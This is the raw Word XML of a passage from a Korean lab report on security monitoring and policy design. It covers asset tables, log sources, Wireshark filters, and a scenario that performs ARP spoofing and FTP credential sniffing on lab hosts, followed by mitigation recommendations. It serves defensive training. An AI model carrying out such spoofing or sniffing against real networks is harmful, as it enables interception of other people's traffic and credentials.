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54"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>5. 보안정책 구현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5-1. 수행 개요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7762"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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구분</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="776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18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수행 목적</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="776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시나리오1 기반 공격 징후 식별 및 보안정책(탐지/차단/운영절차) 구현 결과 정리</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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수행 범위</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="776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네트워크 패킷 분석(Wireshark), 서버 로그 분석(auth/syslog/apache/kern), 차단 정책(UFW/iptables)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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산출물</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="776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정상/비정상 판별 기준, 공격 시나리오 로그 패턴, 차단/대응 Runbook, 정책 구현 매트릭스</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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증빙 삽입 원칙</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="776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각 표/그림의 증빙 ID에 맞춰 PCAP·이미지·로그를 삽입(파일명·시간·대상 자산 표기)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spacing w:after="80" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>표 5-2. 관제/점검 대상 자산</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="957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0"/>
        <w:gridCol w:w="4"/>
        <w:gridCol w:w="2394"/>
        <w:gridCol w:w="2393"/>
        <w:gridCol w:w="2393"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="400"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single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eaeaea"/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  <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>장비명</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="3"/>
              <w:left w:val="dotted" w:color="000000" w:sz="3"/>
              <w:bottom w:val="dotted" w:color="000000" w:sz="3"/>
              <w:right w:val="dotted" w:color="000000" w:sz="3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:fill="eaeaea"/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>
                <w:b/>
              </w:rPr>
              <w:t>별칭</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="3"/>
              <w:left w:val="dotted" w:color="000000" w:sz="3"/>
              <w:bottom w:val="dotted" w:color="000000" w:sz="3"/>
              <w:right w:val="none" w:color="000000" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:fill="eaeaea"/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>
                <w:b/>
              </w:rPr>
              <w:t>모델명</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="3"/>
              <w:left w:val="dotted" w:color="000000" w:sz="3"/>
              <w:bottom w:val="dotted" w:color="000000" w:sz="3"/>
              <w:right w:val="none" w:color="000000" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:fill="eaeaea"/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>
                <w:b/>
              </w:rPr>
              <w:t>수량</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="576"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:gridSpan w:val="2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  <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Router</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="239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R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 xml:space="preserve"> Cisco C7200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13대</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="576"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vMerge w:val="restart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>
                <w:b/>
              </w:rPr>
              <w:t>Switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="239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ESW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 xml:space="preserve"> Cisco C3745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14대</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="1330"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vMerge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</w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="239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L2SW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CiscoIOSvL215.2(20200924:215240)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5대</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="576"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:gridSpan w:val="2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>
                <w:b/>
              </w:rPr>
              <w:t>Frame Relay switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="239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FRSW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 xml:space="preserve">Frame-Relay switch  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3대</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="576"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:gridSpan w:val="2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>
                <w:b/>
              </w:rPr>
              <w:t>자동화 프로그램 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="239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C&amp;C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Rocky9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1대</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="576"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="dotted" w:color="000000" w:sz="3"/>
              <w:left w:val="none" w:color="000000" w:sz="2"/>
              <w:bottom w:val="single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>
                <w:b/>
              </w:rPr>
              <w:t>장비 모니터링 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dotted" w:color="000000" w:sz="3"/>
              <w:left w:val="dotted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MRTG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Rocky9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0" w:line="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>1대</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="768"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa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</w:rPr>
              <w:t>Rocky9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4791" w:type="dxa"/>
            <w:gridSpan w:val="3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"/>
              </w:rPr>
              <w:t>Rocky-9.4-x86_64-dvd.iso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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="768"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa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</w:rPr>
              <w:t>Ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4791" w:type="dxa"/>
            <w:gridSpan w:val="3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"/>
              </w:rPr>
              <w:t>ubuntu-24.04-desktop-amd64.iso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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="709"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa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</w:rPr>
              <w:t>VMWorkStation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4791" w:type="dxa"/>
            <w:gridSpan w:val="3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"/>
              </w:rPr>
              <w:t>VMware-workstation-full-17.6.1-24319023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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="768"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dotted" w:color="000000" w:sz="3"/>
              <w:left w:val="none" w:color="000000" w:sz="2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</w:rPr>
              <w:t>Security Onion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4791" w:type="dxa"/>
            <w:gridSpan w:val="3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Security Onion-16.04.7.3.iso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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="768"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dotted" w:color="000000" w:sz="3"/>
              <w:left w:val="none" w:color="000000" w:sz="2"/>
              <w:bottom w:val="single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</w:rPr>
              <w:t>Kali Linux 25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4791" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="dotted" w:color="000000" w:sz="3"/>
              <w:left w:val="dotted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kali-linux-2025.3-installer-amd64.iso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dotted" w:color="000000" w:sz="3"/>
              <w:left w:val="dotted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5-3. 증빙자료 ID 체계</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="9661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692"/>
        <w:gridCol w:w="4899"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="206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구분</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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증빙 형태</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="489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비고</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="206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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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pcap/pcapng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="489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 재현 가능하도록 기간/필터 기입</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="206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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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캡처 이미지</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="489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필터/표시 필드가 보이도록 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="206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Snort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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경보 화면 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="489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SID/Message/시간/출발지·목적지 포함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="206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터미널</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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명령/출력 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="489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명령 전체와 결과(리턴코드 포함)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="206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로그</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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로그 캡처</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="489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경로/타임스탬프/키워드 강조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5-1. 관제</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>→분석→대응→정책</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 반영 흐름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3118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drawing>
                <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="3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894578" cy="2110740"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTopAndBottom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61f02577.bmp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578" cy="211074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55"/>
        <w:widowControl w:val="off"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>5.1. 관제 수행 결과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관제 수행은 네트워크 패킷 분석(Wireshark)과 서버 로그(auth.log/syslog/apache/kern) 분석을 병행하여 정상/비정상 행위의 판별 기준을 정의하고, 시나리오1 기반 공격 수행 시 생성되는 흔적을 식별·분류하는 방식으로 진행하였다.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5-4. 수집 로그/데이터 및 확인 포인트</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="9661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4843"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr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데이터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수집 위치</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="48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확인 포인트</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr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 캡처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(관제 PCAP 저장소)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="48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ARP 변조/스캔/FTP 평문/HTTP 요청 등</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr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인증 로그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/var/log/auth.log (또는 /var/log/secure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="48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스캔/브루트포스/로그인 성공·실패</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr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시스템 로그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/var/log/syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="48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 AXFR 전송 시작/종료, 서비스 이벤트</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr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 접근 로그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/var/log/apache2/*.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="48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정찰(whatweb)/SQLi/Command Injection 접근 패턴</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr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커널/네트워크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/var/log/kern.log 또는 dmesg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="48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SYN Flooding 등 DoS 징후</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr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방화벽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UFW/iptables 로그(필요 시)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="48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 발생 시점/대상 IP/포트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5-5. 사용 도구 및 활용 목적</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="963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trHeight w:val="0"/>
        </w:trPr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도구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활용 목적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산출물</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr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 필터 기반 정상/비정상 트래픽 식별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필터/판별 기준, 캡처 이미지</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr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서버 로그 분석(tail/grep)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시나리오별 로그 패턴 확인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경로, 키워드</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr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UFW/iptables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시나리오별 차단 정책 적용(접근통제/율제한) 및 재현 검증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 규칙, 적용/검증 결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr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Snort/관제 플랫폼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탐지 룰 기반 경보 생성 및 상관관계 분석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룰셋/경보 화면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5.1-1. 시나리오1 상세( ARP Spoofing)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7026"/>
      </w:tblGrid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동일 IP에 대한 MAC 주소 지속 변조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 필터: arp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동일 IP의 ARP Reply에서 MAC 변경 반복(비정상 징후)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스위치 보안(DAI)·정적 ARP·탐지 룰 적용 검토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(정책/룰/운영절차 기입. 예: UFW/iptables/SSHD/WAF/ACL 등)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5.1-1 증빙자료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9305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9360" w:type="dxa"/>
              <w:tblBorders>
                <w:top w:val="single" w:color="000000" w:sz="7"/>
                <w:left w:val="single" w:color="000000" w:sz="7"/>
                <w:bottom w:val="single" w:color="000000" w:sz="7"/>
                <w:right w:val="single" w:color="000000" w:sz="7"/>
              </w:tblBorders>
              <w:shd w:val="clear" w:color="000000" w:fill="ffffff"/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3120"/>
              <w:gridCol w:w="1530"/>
              <w:gridCol w:w="1590"/>
              <w:gridCol w:w="3120"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr>
                <w:cantSplit/>
                <w:trHeight w:val="56"/>
              </w:trPr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1546606" cy="980821"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="2" name="그림 %d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8.png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6606" cy="980821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20" w:type="dxa"/>
                  <w:gridSpan w:val="2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1847850" cy="571500"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="3" name="그림 %d 3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9.png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5715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1529588" cy="967105"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="4" name="그림 %d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a.pn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9588" cy="967105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892"/>
              </w:trPr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맑은 고딕"/>
                      <w:b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>Scanning</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3120" w:type="dxa"/>
                  <w:gridSpan w:val="2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b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>HostScan을 통한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b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>대량의 ARP 패킷 감지</w:t>
                  </w:r>
                </w:p>
              </w:tc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b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>내부망에 위치한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b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>Host IP 획득</w:t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1847850" cy="444500"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="5" name="그림 %d 5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b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4445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20" w:type="dxa"/>
                  <w:gridSpan w:val="2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1847850" cy="177800"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="6" name="그림 %d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c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1778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1847850" cy="444500"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="7" name="그림 %d 7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d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4445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cccccc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b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>ubuntu(피해자) MAC ID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/>
                      <w:b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>00:0c:29:ef:50:9a</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3120" w:type="dxa"/>
                  <w:gridSpan w:val="2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cccccc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/>
                      <w:b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>router MAC ID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/>
                      <w:b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>ca:02:1a:c0:00:00</w:t>
                  </w:r>
                </w:p>
              </w:tc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cccccc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/>
                      <w:b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>Kali MAC ID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/>
                      <w:b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>00:0c:29:e8:e6:30</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr>
              <w:trPr>
                <w:cantSplit/>
                <w:trHeight w:val="915"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4650" w:type="dxa"/>
                  <w:gridSpan w:val="2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120" w:after="120"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:drawing>
                      <wp:inline distT="127" distB="127" distL="0" distR="0">
                        <wp:extent cx="2523744" cy="1033526"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="8" name="그림 %d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3744" cy="1033526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10" w:type="dxa"/>
                  <w:gridSpan w:val="2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120" w:after="120"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:drawing>
                      <wp:inline distT="127" distB="127" distL="0" distR="0">
                        <wp:extent cx="2494153" cy="1033272"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="9" name="그림 %d 9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7f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4153" cy="1033272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915"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4650" w:type="dxa"/>
                  <w:gridSpan w:val="2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3"/>
                      <w:bottom w:val="none" w:color="000000" w:sz="2" w:space="0"/>
                      <w:right w:val="none" w:color="000000" w:sz="2" w:space="3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b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>타겟 Add로 설정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3"/>
                      <w:bottom w:val="none" w:color="000000" w:sz="2" w:space="0"/>
                      <w:right w:val="none" w:color="000000" w:sz="2" w:space="3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Target1 : Gateway (라우터)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3"/>
                      <w:bottom w:val="none" w:color="000000" w:sz="2" w:space="0"/>
                      <w:right w:val="none" w:color="000000" w:sz="2" w:space="3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Target2 : 우분투투</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4710" w:type="dxa"/>
                  <w:gridSpan w:val="2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3"/>
                      <w:bottom w:val="none" w:color="000000" w:sz="2" w:space="0"/>
                      <w:right w:val="none" w:color="000000" w:sz="2" w:space="3"/>
                    </w:pBdr>
                    <w:snapToGrid w:val="off"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="맑은 고딕"/>
                      <w:b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>ARP posioning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3"/>
                      <w:bottom w:val="none" w:color="000000" w:sz="2" w:space="0"/>
                      <w:right w:val="none" w:color="000000" w:sz="2" w:space="3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18"/>
                    </w:rPr>
                    <w:t># 게이트웨이한테 칼리가 내가 우분투야라고 하고 우분투한테 내가 게이트웨이야 라고 함</w:t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0" distB="0" distL="0" distR="0">
                        <wp:extent cx="1847850" cy="317500"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="9906"/>
                        <wp:docPr id="10" name="그림 %d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0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3175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0" distB="0" distL="0" distR="0">
                        <wp:extent cx="1847850" cy="292100"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:docPr id="11" name="그림 %d 11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2921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20" w:type="dxa"/>
                  <w:gridSpan w:val="2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anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="51" behindDoc="0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0</wp:posOffset>
                        </wp:positionV>
                        <wp:extent cx="1847850" cy="444500"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:wrapSquare wrapText="bothSides"/>
                        <wp:docPr id="12" name="그림 %d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2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4445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anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="52" behindDoc="0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0</wp:posOffset>
                        </wp:positionV>
                        <wp:extent cx="1847850" cy="393700"/>
                        <wp:effectExtent l="10033" t="10033" r="10033" b="10033"/>
                        <wp:wrapSquare wrapText="bothSides"/>
                        <wp:docPr id="13" name="그림 %d 13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3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3937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cccccc"/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Google Sans Text" w:eastAsia="Google Sans Text"/>
                      <w:b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>정상 패킷</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3120" w:type="dxa"/>
                  <w:gridSpan w:val="2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cccccc"/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Google Sans Text" w:eastAsia="Google Sans Text"/>
                      <w:b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>공격 성공</w:t>
                  </w:r>
                </w:p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Google Sans Text" w:eastAsia="Google Sans Text"/>
                      <w:b/>
                      <w:color w:val="0000ff"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>공격자pc -&gt; 게이트웨이</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3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cccccc"/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Google Sans Text" w:eastAsia="Google Sans Text"/>
                      <w:b/>
                      <w:color w:val="1f1f1f"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>공격 성공</w:t>
                  </w:r>
                </w:p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Google Sans Text" w:eastAsia="Google Sans Text"/>
                      <w:b/>
                      <w:color w:val="0000ff"/>
                      <w:sz w:val="20"/>
                    </w:rPr>
                    <w:t>공격자pc -&gt; 피해자Pc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5.1-2. 시나리오1 상세( FTP 패킷 스니핑)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7140"/>
      </w:tblGrid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시나리오1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FTP 패킷 스니핑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평문 Payload 내 계정정보 노출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 필터: ftp || tcp.port == 21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Payload 구간에서 인증정보 노출 여부 확인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FTP 사용 제한 및 SFTP/FTPS 전환 권고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(정책/룰/운영절차 기입. 예: UFW/iptables/SSHD/WAF/ACL 등)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
